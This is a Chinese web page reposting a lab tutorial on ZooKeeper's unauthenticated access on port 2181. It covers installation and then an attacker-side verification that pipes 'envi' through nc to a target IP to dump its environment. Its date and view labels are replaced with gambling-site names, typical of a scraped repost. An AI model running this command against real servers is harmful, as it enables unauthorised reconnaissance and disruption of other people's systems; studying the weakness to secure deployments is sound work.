Zookeeper未授权访问漏洞

365bet手机版网址:2020-03-11 365bet体育在线平台: 8863 次

漏洞先容

ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是谷歌的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的App,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。

Zookeeper 的默认开放端口是2181。Zookeeper 安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用 Zookeeper,通过服务器收集敏感信息或者在 Zookeeper 集群内进行破坏(比如:kill命令)。攻击者能够实行所有只允许由管理员运行的命令。

环境安装

本次在Ubuntu18.04上安装

安装包链接:

http://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/

#解压

tar -zxvf zookeepre-3.4.10.tar.gz

#进入配置文件目录

cd /zookeeper-3.4.10/conf

#将配置文件zoo_sample.cfg拷贝一份,命名为zoo.cfg

cp zoo_sample.cfg zoo.cfg

#打开zoo.cfg     

配置单机模式

vi zoo.cfg

启动zookeeper

cd到zookeeper底下的bin目录#启动./zkServer.sh start
##测试连接
zkCli.sh -server localhost:2181

漏洞验证

同样在kali机上安装zookeeper

攻击机:kali

靶机:ubuntu

1、对靶机进行未授权连接

2、使用命令获取目标的环境

echo envi|nc 192.168.123.124 2181

转自:黑白之道

分享到:
×

微信扫一扫分享

XML 地图 | Sitemap 地图